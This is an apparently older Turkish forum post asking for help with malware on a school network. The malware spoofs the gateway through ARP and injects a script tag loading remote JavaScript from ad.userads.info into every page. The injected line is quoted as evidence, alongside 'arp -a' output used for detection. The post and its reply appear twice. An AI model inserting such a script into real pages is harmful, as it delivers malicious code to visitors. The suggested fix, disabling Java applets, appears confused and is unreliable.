merhaba arkadaşlar,
okulda 3-4 gündür virüslerle uğraşıyorum. ama tam olarak temizleyemedim. yeni bir sistem kuruyorum ancak anında virüs ona da bulaşıyor. Virüs ağdaki bir veya birkaç bilgisayardan bulaşıyor. ilk olarak nasıl bulaştı bilmiyorum. Ama şuanda temiz bir sistemi açıp internette herhangi bir sayfaya girdiğimde virüs o bilgisayara da bulaşıyor. çünkü gelen sayfanın içerisinde şu bilgi yer alıyor :
<script language="javascript" SRC="http://ad.userads.info/ads.js"></script>
her sayfanın içerisinde bu bilgi yerleştiriliyor. peki o zaman modemime mi virüs bulaştı ? hayır ama modeme ulaşmaya çalıştığımda bilgisayar aslında bazen modem yerine virüslü bilgisayara ulaşmaya çalışıyorum. yani virüs modem i taklit ediyor.
virüs ün bulaştığı bilgisayar aynı mac adreslere sahip bir ip daha oluşturuyor ve aynı networkte birden fazla aynı ip numarası oluyor. ( modem için ) yani modemimin ip adresi 192.168.1.1 ise ağda kaç virüslü bilgisayar varsa o kadar da ağ geçidi oluyor (192.168.1.1)
virüslü bilgisayarı şöyle tespit edebilirsiniz.
çalıştırdan "cmd" yazıp command promt a girin.
arp -a
komutunu verin.
aşağıdakine benzer bir çıktı alıyorsanız. virüs o bilgisayarda vardır.
---------------------------------------
Arabirim: 192.168.1.2 --- 0x10003
Internet Adresi Fiziksel Adres Tipi
192.168.1.1 00-0d-87-a8-b0-d8 dinamik
192.168.1.4 00-0d-87-a8-b0-d8 dinamik
192.168.1.20 00-1b-fc-da-74-fd dinamik
-------------------------------------------
eğer bir internet sayfası açarsanız; virüs programınız virüs bulduysa ve windows kod merkezi , adress book viewer başlıklı hata mesajarı alıyorsanız ağınızdaki bir bilgisayarda virüs vardır. hata mesajlarının resimlerini ekliyecem.
virüsün ismini bilmiyorum ama virüs programlarının ağdaki bilgisayarlarda buldukları virüs isimleri şöyle : almanahe (alman.b), malware.sbdldg, exp/flash.gen[exploit], hiddenext, crypt.xdr.gen.
ben almanahe den şüpheleniyorum.
virüs hosts dosyasınıda değiştirip bir sürü adres ekliyor hosts dosyasının boyutu 200 kb lara kadar çıkıyor (normalde 1kb). ağın yavaşlamasına ağdaki bilgisayarların internetteki sayfaları çok yavaş açmasına hatta bazen internet browserınızın kitlenmesine yol açıyor.
daha önceden bu virüsle karşılaşan kimse var mı ? ağımı bu virüsten nasıl kurtarabilirim?
şimdiden teşekkürler . . .
yanlışlarım varsa lütfen düzeltin arkadaşlar.
iyi çalışmalarr
------------------------------------------------------------------------------------
Ağdaki bilgisayarlarda java programcıklarının çalışmasını devre dışı bırakırsanız o bilgisayarlarda sorunsuz bir şekilde internete girebilirsiniz. Eğer kapatmazsanız Virüs programları internette gezinirken sürekli virüs buluyor.
İE' de araçlar>internet seçenekleri>güvenlik>özel düzey> Komut Dosyası kısmında java programcıklarının çalıştırılması Devre dışı bırak seçeneğini seçin. Tamam Tamam diyerek pencereleri kapatın.
okulda 3-4 gündür virüslerle uğraşıyorum. ama tam olarak temizleyemedim. yeni bir sistem kuruyorum ancak anında virüs ona da bulaşıyor. Virüs ağdaki bir veya birkaç bilgisayardan bulaşıyor. ilk olarak nasıl bulaştı bilmiyorum. Ama şuanda temiz bir sistemi açıp internette herhangi bir sayfaya girdiğimde virüs o bilgisayara da bulaşıyor. çünkü gelen sayfanın içerisinde şu bilgi yer alıyor :
<script language="javascript" SRC="http://ad.userads.info/ads.js"></script>
her sayfanın içerisinde bu bilgi yerleştiriliyor. peki o zaman modemime mi virüs bulaştı ? hayır ama modeme ulaşmaya çalıştığımda bilgisayar aslında bazen modem yerine virüslü bilgisayara ulaşmaya çalışıyorum. yani virüs modem i taklit ediyor.
virüs ün bulaştığı bilgisayar aynı mac adreslere sahip bir ip daha oluşturuyor ve aynı networkte birden fazla aynı ip numarası oluyor. ( modem için ) yani modemimin ip adresi 192.168.1.1 ise ağda kaç virüslü bilgisayar varsa o kadar da ağ geçidi oluyor (192.168.1.1)
virüslü bilgisayarı şöyle tespit edebilirsiniz.
çalıştırdan "cmd" yazıp command promt a girin.
arp -a
komutunu verin.
aşağıdakine benzer bir çıktı alıyorsanız. virüs o bilgisayarda vardır.
---------------------------------------
Arabirim: 192.168.1.2 --- 0x10003
Internet Adresi Fiziksel Adres Tipi
192.168.1.1 00-0d-87-a8-b0-d8 dinamik
192.168.1.4 00-0d-87-a8-b0-d8 dinamik
192.168.1.20 00-1b-fc-da-74-fd dinamik
-------------------------------------------
eğer bir internet sayfası açarsanız; virüs programınız virüs bulduysa ve windows kod merkezi , adress book viewer başlıklı hata mesajarı alıyorsanız ağınızdaki bir bilgisayarda virüs vardır. hata mesajlarının resimlerini ekliyecem.
virüsün ismini bilmiyorum ama virüs programlarının ağdaki bilgisayarlarda buldukları virüs isimleri şöyle : almanahe (alman.b), malware.sbdldg, exp/flash.gen[exploit], hiddenext, crypt.xdr.gen.
ben almanahe den şüpheleniyorum.
virüs hosts dosyasınıda değiştirip bir sürü adres ekliyor hosts dosyasının boyutu 200 kb lara kadar çıkıyor (normalde 1kb). ağın yavaşlamasına ağdaki bilgisayarların internetteki sayfaları çok yavaş açmasına hatta bazen internet browserınızın kitlenmesine yol açıyor.
daha önceden bu virüsle karşılaşan kimse var mı ? ağımı bu virüsten nasıl kurtarabilirim?
şimdiden teşekkürler . . .
yanlışlarım varsa lütfen düzeltin arkadaşlar.
iyi çalışmalarr
------------------------------------------------------------------------------------
Ağdaki bilgisayarlarda java programcıklarının çalışmasını devre dışı bırakırsanız o bilgisayarlarda sorunsuz bir şekilde internete girebilirsiniz. Eğer kapatmazsanız Virüs programları internette gezinirken sürekli virüs buluyor.
İE' de araçlar>internet seçenekleri>güvenlik>özel düzey> Komut Dosyası kısmında java programcıklarının çalıştırılması Devre dışı bırak seçeneğini seçin. Tamam Tamam diyerek pencereleri kapatın.